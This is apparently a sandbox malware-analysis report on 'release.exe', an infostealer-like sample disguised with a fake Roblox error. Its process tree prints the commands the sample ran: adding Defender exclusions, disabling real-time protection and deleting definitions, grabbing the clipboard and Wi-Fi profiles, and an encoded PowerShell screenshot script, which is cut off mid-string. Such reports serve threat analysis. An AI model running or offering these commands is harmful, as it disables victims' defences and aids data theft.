Analysis
-
max time kernel
145s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 00:18
Behavioral task
behavioral1
Sample
release.exe
Resource
win7-20240221-en
General
-
Target
release.exe
-
Size
5.9MB
-
MD5
6d46969ab9ba73f9c14cb57c8911f492
-
SHA1
f65f0a1aa15eaec933b320fd0f6bdc59535f6d28
-
SHA256
2edfd48c7fc7f707fe235d05551b61a882296b5b9097e79823219bc0cde8f90a
-
SHA512
f93a65d80ca72813e0381e4c014e7f1ac913e1cdff652ce0fa1511cf24c87e33d2011ff6b05fe3f65341355c7c20704196bd4510f5357bf40a079dc1abf8ea82
-
SSDEEP
98304:WrOVmoDUN43WlaEjjOjFgFEblNHYSxTpirSHcUR43zrwkdA8QJCKC7bN3mb6aBn4:WrOVumWzOjmFwDRxtYSHdK34kdai7bNp
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 2628 powershell.exe 2712 powershell.exe 4688 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exerelease.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts release.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Executes dropped EXE 1 IoCs
Processes:
rar.exepid process 3304 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
release.exepid process 3804 release.exe 3804 release.exe 3804 release.exe 3804 release.exe 3804 release.exe 3804 release.exe 3804 release.exe 3804 release.exe 3804 release.exe 3804 release.exe 3804 release.exe 3804 release.exe 3804 release.exe 3804 release.exe 3804 release.exe 3804 release.exe 3804 release.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI49362\python310.dll upx behavioral2/memory/3804-25-0x00007FFDAE9F0000-0x00007FFDAEE56000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\libffi-7.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\libcrypto-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\_ssl.pyd upx behavioral2/memory/3804-48-0x00007FFDC72D0000-0x00007FFDC72DF000-memory.dmp upx behavioral2/memory/3804-47-0x00007FFDC21B0000-0x00007FFDC21D4000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI49362\libssl-1_1.dll upx behavioral2/memory/3804-54-0x00007FFDC2180000-0x00007FFDC21AC000-memory.dmp upx behavioral2/memory/3804-57-0x00007FFDC3040000-0x00007FFDC3058000-memory.dmp upx behavioral2/memory/3804-58-0x00007FFDBE990000-0x00007FFDBE9AF000-memory.dmp upx behavioral2/memory/3804-60-0x00007FFDAE290000-0x00007FFDAE40A000-memory.dmp upx behavioral2/memory/3804-62-0x00007FFDBE080000-0x00007FFDBE099000-memory.dmp upx behavioral2/memory/3804-64-0x00007FFDC2170000-0x00007FFDC217D000-memory.dmp upx behavioral2/memory/3804-71-0x00007FFDADF10000-0x00007FFDAE289000-memory.dmp upx behavioral2/memory/3804-70-0x00007FFDBDD60000-0x00007FFDBDE18000-memory.dmp upx behavioral2/memory/3804-69-0x00007FFDBDF20000-0x00007FFDBDF4E000-memory.dmp upx behavioral2/memory/3804-79-0x00007FFDAE710000-0x00007FFDAE828000-memory.dmp upx behavioral2/memory/3804-78-0x00007FFDAE9F0000-0x00007FFDAEE56000-memory.dmp upx behavioral2/memory/3804-76-0x00007FFDC0110000-0x00007FFDC011D000-memory.dmp upx behavioral2/memory/3804-75-0x00007FFDBD280000-0x00007FFDBD295000-memory.dmp upx behavioral2/memory/3804-80-0x00007FFDC21B0000-0x00007FFDC21D4000-memory.dmp upx behavioral2/memory/3804-180-0x00007FFDBE990000-0x00007FFDBE9AF000-memory.dmp upx behavioral2/memory/3804-239-0x00007FFDAE290000-0x00007FFDAE40A000-memory.dmp upx behavioral2/memory/3804-273-0x00007FFDBD280000-0x00007FFDBD295000-memory.dmp upx behavioral2/memory/3804-274-0x00007FFDC0110000-0x00007FFDC011D000-memory.dmp upx behavioral2/memory/3804-287-0x00007FFDADF10000-0x00007FFDAE289000-memory.dmp upx behavioral2/memory/3804-286-0x00007FFDBDD60000-0x00007FFDBDE18000-memory.dmp upx behavioral2/memory/3804-285-0x00007FFDBDF20000-0x00007FFDBDF4E000-memory.dmp upx behavioral2/memory/3804-284-0x00007FFDC2170000-0x00007FFDC217D000-memory.dmp upx behavioral2/memory/3804-283-0x00007FFDBE080000-0x00007FFDBE099000-memory.dmp upx behavioral2/memory/3804-282-0x00007FFDAE290000-0x00007FFDAE40A000-memory.dmp upx behavioral2/memory/3804-281-0x00007FFDBE990000-0x00007FFDBE9AF000-memory.dmp upx behavioral2/memory/3804-280-0x00007FFDC3040000-0x00007FFDC3058000-memory.dmp upx behavioral2/memory/3804-279-0x00007FFDC2180000-0x00007FFDC21AC000-memory.dmp upx behavioral2/memory/3804-278-0x00007FFDC72D0000-0x00007FFDC72DF000-memory.dmp upx behavioral2/memory/3804-277-0x00007FFDC21B0000-0x00007FFDC21D4000-memory.dmp upx behavioral2/memory/3804-276-0x00007FFDAE9F0000-0x00007FFDAEE56000-memory.dmp upx behavioral2/memory/3804-275-0x00007FFDAE710000-0x00007FFDAE828000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 13 ip-api.com 30 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid process 1036 WMIC.exe 2556 WMIC.exe 656 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 1748 tasklist.exe 1416 tasklist.exe 4136 tasklist.exe 1040 tasklist.exe 5040 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2628 powershell.exe 1528 powershell.exe 1528 powershell.exe 2628 powershell.exe 2628 powershell.exe 1528 powershell.exe 2712 powershell.exe 2712 powershell.exe 532 powershell.exe 532 powershell.exe 4688 powershell.exe 4688 powershell.exe 532 powershell.exe 4688 powershell.exe 812 powershell.exe 812 powershell.exe 812 powershell.exe 808 powershell.exe 808 powershell.exe 244 powershell.exe 244 powershell.exe 5032 powershell.exe 5032 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeWMIC.exetasklist.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2628 powershell.exe Token: SeIncreaseQuotaPrivilege 2552 WMIC.exe Token: SeSecurityPrivilege 2552 WMIC.exe Token: SeTakeOwnershipPrivilege 2552 WMIC.exe Token: SeLoadDriverPrivilege 2552 WMIC.exe Token: SeSystemProfilePrivilege 2552 WMIC.exe Token: SeSystemtimePrivilege 2552 WMIC.exe Token: SeProfSingleProcessPrivilege 2552 WMIC.exe Token: SeIncBasePriorityPrivilege 2552 WMIC.exe Token: SeCreatePagefilePrivilege 2552 WMIC.exe Token: SeBackupPrivilege 2552 WMIC.exe Token: SeRestorePrivilege 2552 WMIC.exe Token: SeShutdownPrivilege 2552 WMIC.exe Token: SeDebugPrivilege 2552 WMIC.exe Token: SeSystemEnvironmentPrivilege 2552 WMIC.exe Token: SeRemoteShutdownPrivilege 2552 WMIC.exe Token: SeUndockPrivilege 2552 WMIC.exe Token: SeManageVolumePrivilege 2552 WMIC.exe Token: 33 2552 WMIC.exe Token: 34 2552 WMIC.exe Token: 35 2552 WMIC.exe Token: 36 2552 WMIC.exe Token: SeDebugPrivilege 1748 tasklist.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeIncreaseQuotaPrivilege 2552 WMIC.exe Token: SeSecurityPrivilege 2552 WMIC.exe Token: SeTakeOwnershipPrivilege 2552 WMIC.exe Token: SeLoadDriverPrivilege 2552 WMIC.exe Token: SeSystemProfilePrivilege 2552 WMIC.exe Token: SeSystemtimePrivilege 2552 WMIC.exe Token: SeProfSingleProcessPrivilege 2552 WMIC.exe Token: SeIncBasePriorityPrivilege 2552 WMIC.exe Token: SeCreatePagefilePrivilege 2552 WMIC.exe Token: SeBackupPrivilege 2552 WMIC.exe Token: SeRestorePrivilege 2552 WMIC.exe Token: SeShutdownPrivilege 2552 WMIC.exe Token: SeDebugPrivilege 2552 WMIC.exe Token: SeSystemEnvironmentPrivilege 2552 WMIC.exe Token: SeRemoteShutdownPrivilege 2552 WMIC.exe Token: SeUndockPrivilege 2552 WMIC.exe Token: SeManageVolumePrivilege 2552 WMIC.exe Token: 33 2552 WMIC.exe Token: 34 2552 WMIC.exe Token: 35 2552 WMIC.exe Token: 36 2552 WMIC.exe Token: SeIncreaseQuotaPrivilege 1036 WMIC.exe Token: SeSecurityPrivilege 1036 WMIC.exe Token: SeTakeOwnershipPrivilege 1036 WMIC.exe Token: SeLoadDriverPrivilege 1036 WMIC.exe Token: SeSystemProfilePrivilege 1036 WMIC.exe Token: SeSystemtimePrivilege 1036 WMIC.exe Token: SeProfSingleProcessPrivilege 1036 WMIC.exe Token: SeIncBasePriorityPrivilege 1036 WMIC.exe Token: SeCreatePagefilePrivilege 1036 WMIC.exe Token: SeBackupPrivilege 1036 WMIC.exe Token: SeRestorePrivilege 1036 WMIC.exe Token: SeShutdownPrivilege 1036 WMIC.exe Token: SeDebugPrivilege 1036 WMIC.exe Token: SeSystemEnvironmentPrivilege 1036 WMIC.exe Token: SeRemoteShutdownPrivilege 1036 WMIC.exe Token: SeUndockPrivilege 1036 WMIC.exe Token: SeManageVolumePrivilege 1036 WMIC.exe Token: 33 1036 WMIC.exe Token: 34 1036 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
release.exerelease.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4936 wrote to memory of 3804 4936 release.exe release.exe PID 4936 wrote to memory of 3804 4936 release.exe release.exe PID 3804 wrote to memory of 1040 3804 release.exe cmd.exe PID 3804 wrote to memory of 1040 3804 release.exe cmd.exe PID 3804 wrote to memory of 3816 3804 release.exe cmd.exe PID 3804 wrote to memory of 3816 3804 release.exe cmd.exe PID 3804 wrote to memory of 4884 3804 release.exe cmd.exe PID 3804 wrote to memory of 4884 3804 release.exe cmd.exe PID 3804 wrote to memory of 1080 3804 release.exe cmd.exe PID 3804 wrote to memory of 1080 3804 release.exe cmd.exe PID 3804 wrote to memory of 316 3804 release.exe cmd.exe PID 3804 wrote to memory of 316 3804 release.exe cmd.exe PID 1040 wrote to memory of 2628 1040 cmd.exe powershell.exe PID 1040 wrote to memory of 2628 1040 cmd.exe powershell.exe PID 316 wrote to memory of 2552 316 cmd.exe WMIC.exe PID 316 wrote to memory of 2552 316 cmd.exe WMIC.exe PID 1080 wrote to memory of 1748 1080 cmd.exe tasklist.exe PID 1080 wrote to memory of 1748 1080 cmd.exe tasklist.exe PID 3816 wrote to memory of 1528 3816 cmd.exe powershell.exe PID 3816 wrote to memory of 1528 3816 cmd.exe powershell.exe PID 4884 wrote to memory of 1376 4884 cmd.exe mshta.exe PID 4884 wrote to memory of 1376 4884 cmd.exe mshta.exe PID 3804 wrote to memory of 3708 3804 release.exe cmd.exe PID 3804 wrote to memory of 3708 3804 release.exe cmd.exe PID 3708 wrote to memory of 4300 3708 cmd.exe reg.exe PID 3708 wrote to memory of 4300 3708 cmd.exe reg.exe PID 3804 wrote to memory of 772 3804 release.exe cmd.exe PID 3804 wrote to memory of 772 3804 release.exe cmd.exe PID 772 wrote to memory of 4684 772 cmd.exe reg.exe PID 772 wrote to memory of 4684 772 cmd.exe reg.exe PID 3804 wrote to memory of 1916 3804 release.exe cmd.exe PID 3804 wrote to memory of 1916 3804 release.exe cmd.exe PID 1916 wrote to memory of 1036 1916 cmd.exe WMIC.exe PID 1916 wrote to memory of 1036 1916 cmd.exe WMIC.exe PID 3804 wrote to memory of 1736 3804 release.exe cmd.exe PID 3804 wrote to memory of 1736 3804 release.exe cmd.exe PID 1736 wrote to memory of 2556 1736 cmd.exe WMIC.exe PID 1736 wrote to memory of 2556 1736 cmd.exe WMIC.exe PID 3804 wrote to memory of 4432 3804 release.exe cmd.exe PID 3804 wrote to memory of 4432 3804 release.exe cmd.exe PID 4432 wrote to memory of 2712 4432 cmd.exe powershell.exe PID 4432 wrote to memory of 2712 4432 cmd.exe powershell.exe PID 3804 wrote to memory of 4568 3804 release.exe cmd.exe PID 3804 wrote to memory of 4568 3804 release.exe cmd.exe PID 3804 wrote to memory of 4928 3804 release.exe cmd.exe PID 3804 wrote to memory of 4928 3804 release.exe cmd.exe PID 4568 wrote to memory of 4136 4568 cmd.exe tasklist.exe PID 4568 wrote to memory of 4136 4568 cmd.exe tasklist.exe PID 4928 wrote to memory of 1416 4928 cmd.exe tasklist.exe PID 4928 wrote to memory of 1416 4928 cmd.exe tasklist.exe PID 3804 wrote to memory of 2252 3804 release.exe cmd.exe PID 3804 wrote to memory of 2252 3804 release.exe cmd.exe PID 3804 wrote to memory of 3572 3804 release.exe cmd.exe PID 3804 wrote to memory of 3572 3804 release.exe cmd.exe PID 3804 wrote to memory of 5096 3804 release.exe cmd.exe PID 3804 wrote to memory of 5096 3804 release.exe cmd.exe PID 2252 wrote to memory of 2540 2252 cmd.exe WMIC.exe PID 2252 wrote to memory of 2540 2252 cmd.exe WMIC.exe PID 3804 wrote to memory of 3712 3804 release.exe cmd.exe PID 3804 wrote to memory of 3712 3804 release.exe cmd.exe PID 3804 wrote to memory of 4536 3804 release.exe cmd.exe PID 3804 wrote to memory of 4536 3804 release.exe cmd.exe PID 3804 wrote to memory of 4416 3804 release.exe cmd.exe PID 3804 wrote to memory of 4416 3804 release.exe cmd.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 464 attrib.exe 3352 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\release.exe"C:\Users\Admin\AppData\Local\Temp\release.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Users\Admin\AppData\Local\Temp\release.exe"C:\Users\Admin\AppData\Local\Temp\release.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\release.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\release.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error Code : _4 Cannot Find Roblox Path Location. Please Re-install and try again.', 0, 'Error', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error Code : _4 Cannot Find Roblox Path Location. Please Re-install and try again.', 0, 'Error', 0+16);close()"4⤵PID:1376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:4300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:2540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵PID:3572
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5096
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3712
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵PID:4536
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵PID:3304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:4416
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:2152
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:1748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAK